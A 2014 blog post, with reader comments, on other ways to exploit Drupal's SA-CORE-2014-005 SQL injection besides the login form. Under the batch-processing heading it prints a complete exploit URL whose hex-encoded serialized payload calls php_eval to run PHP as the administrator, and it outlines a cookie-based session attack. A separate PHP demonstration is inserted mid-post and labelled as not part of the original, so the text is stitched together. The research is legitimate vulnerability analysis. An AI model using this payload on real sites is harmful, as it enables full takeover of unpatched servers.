Heine
Other vectors for SA-CORE-2014-005?

Heine —Fri, 2014/10/31 - 21:57

This is intended as a comment on Acquia's "Learning from hackers a week after the Drupal SQL Injection announcement", but Mollom prevents me from posting it there. In it, scor asks:

An open question is whether the SQL injection vulnerability was exploitable via some vector other than via the user login form.

Absolutely! Any path accessible to anonymous users that passes user-supplied data into a query is vulnerable. POSTs to the login form are not necessary. Examples:

System batch processing

The path to the batch system is accessible to anonymous users, because the page performs its access checks only after running a SQL query. That SQL query accepts an id taken from the request. Either GET or POST works. Depending on your PHP configuration, even a COOKIE value can be used.

http://domain/batch?id[1+AND+token%3D%27foo%27+UNION+SELECT+X%27613a31323a7b733a343a2273657473223b613a313a7b693a303b613a31343a7b733a373a2273616e64626f78223b613a303a7b7d733a373a22726573756c7473223b613a303a7b7d733a373a2273756363657373223b623a303b733a353a227374617274223b693a303b733a373a22656c6170736564223b693a303b733a31313a2270726f6772657373697665223b623a313b733a353a227469746c65223b733a31303a2250726f63657373696e67223b733a31323a22696e69745f6d657373616765223b733a32343a22496e697469616c697a696e672e3c62722f3e266e6273703b223b733a31363a2270726f67726573735f6d657373616765223b733a32393a22436f6d706c65746564204063757272656e74206f662040746f74616c2e223b733a31333a226572726f725f6d657373616765223b733a32323a22416e206572726f7220686173206f636375727265642e223b733a333a22637373223b613a303a7b7d733a353a22746f74616c223b693a323b733a353a22636f756e74223b693a323b733a353a227175657565223b613a323a7b733a343a226e616d65223b733a32313a2264727570616c5f62617463683a3434373836333a30223b733a353a22636c617373223b733a31303a2242617463685175657565223b7d7d7d733a31363a226861735f666f726d5f7375626d697473223b623a303b733a31313a2263757272656e745f736574223b693a303b733a31313a2270726f6772657373697665223b623a313b733a333a2275726c223b733a373a227768617465763b223b733a31313a2275726c5f6f7074696f6e73223b613a303a7b7d733a31303a22736f757263655f75726c223b733a34313a223c3f70687020676c6f62616c2024757365723b202475736572203d20757365725f6c6f61642831293b223b733a383a227265646972656374223b623a303b733a353a227468656d65223b733a363a2262617274696b223b733a31373a2272656469726563745f63616c6c6261636b223b733a383a227068705f6576616c223b733a323a226964223b733a363a22343437383633223b733a31333a226572726f725f6d657373616765223b733a37363a22506c6561736520636f6e74696e756520746f203c6120687265663d222f323f69643d34343738363326616d703b6f703d66696e6973686564223e746865206572726f7220706167653c2f613e223b7d%27+--+]=&id[1]&op=finished

If one prefers, and is able to upload files to the site, a slightly modified query can cause that file to be executed. Alternatively, one could piggyback on the unserialize() call and trigger a destructor.
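As an added illustration that is not part of the original post or of Drupal's own code, the stand-alone PHP below re-creates the array-placeholder expansion behind SA-CORE-2014-005 in its pre-fix form and with the array_values() change from the fix, and runs both on a constructed batch-style request of the same shape as the URL above (the function names, query text and request values are assumptions of mine):

```php
<?php
// Stand-alone re-creation (not Drupal's file) of the array-placeholder
// expansion that SA-CORE-2014-005 fixed. Array keys supplied by the client
// are concatenated into the SQL text in the pre-fix form; the fixed form
// replaces them with 0, 1, 2, ... via array_values().

function expandArgumentsVulnerable($query, array $args) {
  foreach (array_filter($args, 'is_array') as $key => $data) {
    $new_keys = array();
    foreach ($data as $i => $value) {               // $i is the client's key
      $new_keys[$key . '_' . $i] = $value;
    }
    $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
    unset($args[$key]);
    $args += $new_keys;
  }
  return array($query, $args);
}

function expandArgumentsFixed($query, array $args) {
  foreach (array_filter($args, 'is_array') as $key => $data) {
    $new_keys = array();
    foreach (array_values($data) as $i => $value) { // $i is now 0, 1, 2, ...
      $new_keys[$key . '_' . $i] = $value;
    }
    $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
    unset($args[$key]);
    $args += $new_keys;
  }
  return array($query, $args);
}

// Constructed request: an array where the batch page expects a scalar id,
// mirroring /batch?id[<text>]=&id[1]= from the post. The key text is
// deliberately harmless here; what matters is that it reaches the SQL.
$request_id = array("1 AND 1=0 -- " => '', 1 => '');
$query = 'SELECT batch FROM {batch} WHERE bid = :bid AND token = :token';
$args  = array(':bid' => $request_id, ':token' => 'constructed-token');

list($q_before, $a_before) = expandArgumentsVulnerable($query, $args);
list($q_after,  $a_after)  = expandArgumentsFixed($query, $args);

// Before the fix the client's key is now part of the statement text.
echo "before fix: $q_before\n";
// After the fix only :bid_0, :bid_1 appear; the statement is still malformed
// for a scalar column, so the database rejects it instead of running
// attacker-chosen SQL.
echo "after fix:  $q_after\n";
```

The same expansion is what the session-handling query and any other anonymous path with an array-valued placeholder go through, which is why the login form is only one of several entry points.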

Session handling code (COOKIE)

The default session handling code stores information in the database. It has to query on session values to obtain stored session information.

If the site uses HTTPS, a value from $_COOKIE is used in such a query. This value can be used to conduct a SQL injection attack. An exploit could result in uid 1 access to the site, possibly _without_ even having to insert a session into the db.

I haven't seen these, nor use of other potential avenues in the wild, but then again, I can only observe a small number of sites.

Comments

Submitted by scor (not verified) on Sat, 2014/11/01 - 01:22

Thanks Heine for your research, and sorry about the Mollom trouble. On the bright side, I think your comment was well worth a blog post of its own! I've posted a link to this blog post from my blog post on acquia.com.

It's not clear in your post whether you have seen those vectors being exploited in the wild. I'd be curious to know if you or anyone else has seen them for real exploits.

Submitted by Heine on Sat, 2014/11/01 - 07:22

Thank you. I have not seen these and other avenues used in the wild atm. I've updated the post to say so.

Submitted by Fabianx (not verified) on Sun, 2014/11/02 - 01:09

There had been proof-of-concept code in the wild directly logging a user in as uid 1, but I don't remember if it used $_COOKIE.

Copyright © 2021 by Heine Deelstra. All rights reserved.